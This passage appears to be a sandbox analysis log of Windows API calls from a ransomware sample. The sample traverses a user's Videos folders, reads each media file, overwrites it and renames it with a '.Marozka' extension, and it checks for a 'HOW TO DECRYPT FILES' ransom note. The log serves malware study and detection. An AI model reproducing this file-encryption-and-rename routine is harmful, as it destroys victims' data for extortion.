lpBuffer=0x3835a88*, nNumberOfBytesToWrite=0x17430, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x3835a88*, lpNumberOfBytesWritten=0x5bea3c*=0x17430, lpOverlapped=0x0) returned 1 [0059.496] CloseHandle (hObject=0x2e0) returned 1 [0059.500] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4", lpFilePart=0x0) returned 0x32 [0059.500] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4.Marozka", lpFilePart=0x0) returned 0x3a [0059.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0059.500] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\q_szziun.mp4"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31a83870, ftCreationTime.dwHighDateTime=0x1d4cb4f, ftLastAccessTime.dwLowDateTime=0xebb0b030, ftLastAccessTime.dwHighDateTime=0x1d4ced8, ftLastWriteTime.dwLowDateTime=0xe630e565, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x17430)) returned 1 [0059.500] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0059.500] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\q_szziun.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\CRJCsTY6F0koOi\\Q_SZzIUN.mp4.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\crjcsty6f0kooi\\q_szziun.mp4.marozka")) returned 1 [0059.500] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0059.500] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8", lpFilePart=0x0) returned 0x29 [0059.501] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d688 [0059.501] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.501] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.501] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.501] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.502] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.502] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.502] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.502] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0059.502] FindClose (in: hFindFile=0xa7d688 | out: hFindFile=0xa7d688) returned 1 [0059.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0059.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0059.502] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0059.502] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8", lpFilePart=0x0) returned 0x29 [0059.502] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7dcc8 [0059.502] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.503] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.503] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.503] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.503] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.503] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.503] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0059.503] FindNextFileW (in: hFindFile=0xa7dcc8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0059.503] FindClose (in: hFindFile=0xa7dcc8 | out: hFindFile=0xa7dcc8) returned 1 [0059.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0059.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0059.504] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv", lpFilePart=0x0) returned 0x34 [0059.504] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0059.504] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\wdbnga.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.504] GetFileType (hFile=0x2e0) returned 0x1 [0059.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0059.504] GetFileType (hFile=0x2e0) returned 0x1 [0059.504] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0xf97b [0059.504] ReadFile (in: hFile=0x2e0, lpBuffer=0x262eea0, nNumberOfBytesToRead=0xf97b, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x262eea0*, lpNumberOfBytesRead=0x5bea48*=0xf97b, lpOverlapped=0x0) returned 1 [0059.504] CloseHandle (hObject=0x2e0) returned 1 [0059.598] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0059.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0059.598] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0059.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0059.599] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv", lpFilePart=0x0) returned 0x34 [0059.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0059.599] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\wdbnga.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.600] GetFileType (hFile=0x2e0) returned 0x1 [0059.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0059.600] GetFileType (hFile=0x2e0) returned 0x1 [0059.600] WriteFile (in: hFile=0x2e0, lpBuffer=0x26aaa7c*, nNumberOfBytesToWrite=0xf980, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x26aaa7c*, lpNumberOfBytesWritten=0x5bea3c*=0xf980, lpOverlapped=0x0) returned 1 [0059.602] CloseHandle (hObject=0x2e0) returned 1 [0059.603] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv", lpFilePart=0x0) returned 0x34 [0059.603] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv.Marozka", lpFilePart=0x0) returned 0x3c [0059.603] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0059.603] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\wdbnga.mkv"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fe19840, ftCreationTime.dwHighDateTime=0x1d4c7c4, ftLastAccessTime.dwLowDateTime=0x8d950c50, ftLastAccessTime.dwHighDateTime=0x1d4d55c, ftLastWriteTime.dwLowDateTime=0xe641cee9, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xf980)) returned 1 [0059.604] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0059.604] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\wdbnga.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\wDBnGA.mkv.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\wdbnga.mkv.marozka")) returned 1 [0059.604] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0059.604] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\v6wfFy", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\v6wfFy", lpFilePart=0x0) returned 0x30 [0059.604] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\v6wfFy\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d688 [0059.604] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.605] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.605] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.605] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.605] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0059.605] FindClose (in: hFindFile=0xa7d688 | out: hFindFile=0xa7d688) returned 1 [0059.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0059.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0059.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0059.605] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\v6wfFy", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\v6wfFy", lpFilePart=0x0) returned 0x30 [0059.605] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\v6wfFy\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7dac8 [0059.605] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.606] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.606] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.606] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.606] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0059.606] FindClose (in: hFindFile=0xa7dac8 | out: hFindFile=0xa7dac8) returned 1 [0059.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0059.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0059.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0059.606] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh", lpFilePart=0x0) returned 0x32 [0059.606] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d888 [0059.607] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.607] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.607] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.607] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.607] FindNextFileW (in: hFindFile=0xa7d888, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0059.607] FindClose (in: hFindFile=0xa7d888 | out: hFindFile=0xa7d888) returned 1 [0059.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0059.607] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0059.607] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0059.607] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh", lpFilePart=0x0) returned 0x32 [0059.608] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d788 [0059.608] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.608] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.608] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.608] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0059.608] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0059.608] FindClose (in: hFindFile=0xa7d788 | out: hFindFile=0xa7d788) returned 1 [0059.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0059.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0059.609] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv", lpFilePart=0x0) returned 0x3f [0059.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0059.609] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\adhj1kzu.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.609] GetFileType (hFile=0x2e0) returned 0x1 [0059.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0059.609] GetFileType (hFile=0x2e0) returned 0x1 [0059.609] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x14fed [0059.609] ReadFile (in: hFile=0x2e0, lpBuffer=0x384ced8, nNumberOfBytesToRead=0x14fed, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x384ced8*, lpNumberOfBytesRead=0x5be9d4*=0x14fed, lpOverlapped=0x0) returned 1 [0059.609] CloseHandle (hObject=0x2e0) returned 1 [0059.625] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0059.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0059.625] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0059.625] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0059.625] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv", lpFilePart=0x0) returned 0x3f [0059.625] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0059.625] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\adhj1kzu.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0059.697] GetFileType (hFile=0x2e0) returned 0x1 [0059.697] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0059.697] GetFileType (hFile=0x2e0) returned 0x1 [0059.697] WriteFile (in: hFile=0x2e0, lpBuffer=0x36b4d48*, nNumberOfBytesToWrite=0x14ff0, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x36b4d48*, lpNumberOfBytesWritten=0x5be9c8*=0x14ff0, lpOverlapped=0x0) returned 1 [0059.699] CloseHandle (hObject=0x2e0) returned 1 [0059.701] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv", lpFilePart=0x0) returned 0x3f [0059.701] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv.Marozka", lpFilePart=0x0) returned 0x47 [0059.701] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0059.701] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\adhj1kzu.mkv"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c36680, ftCreationTime.dwHighDateTime=0x1d4c5c1, ftLastAccessTime.dwLowDateTime=0xd0bb9b40, ftLastAccessTime.dwHighDateTime=0x1d4c803, ftLastWriteTime.dwLowDateTime=0xe64fe31f, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x14ff0)) returned 1 [0059.701] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0059.701] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\adhj1kzu.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\adhj1KZU.mkv.Marozka" (normalized: "c:\\users\\fd1hvy\\videos\\ilj8a7fqbwdbqmdze8\\vcswuhxh\\adhj1kzu.mkv.marozka")) returned 1 [0059.703] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0059.703] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL", lpFilePart=0x0) returned 0x46 [0059.703] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7d688 [0059.703] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0059.703] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0059.703] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0059.703] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0059.703] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0059.703] FindNextFileW (in: hFindFile=0xa7d688, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 0 [0059.704] FindClose (in: hFindFile=0xa7d688 | out: hFindFile=0xa7d688) returned 1 [0059.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9c8) returned 1 [0059.704] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9d4) returned 1 [0059.704] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea0c) returned 1 [0059.704] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL", nBufferLength=0x105, lpBuffer=0x5be4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL", lpFilePart=0x0) returned 0x46 [0059.704] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\iLJ8a7fqBWDbQMDZE8\\VCSWUhXh\\jdF-KbLKorUrpayi0jL\\*", lpFindFileData=0x5be734 | out: lpFindFileData=0x5be734) returned 0xa7d988 [0059.704] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be740 | out: lpFindFileData=0x5be740) returned 1 [0059.704] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be740 | out: 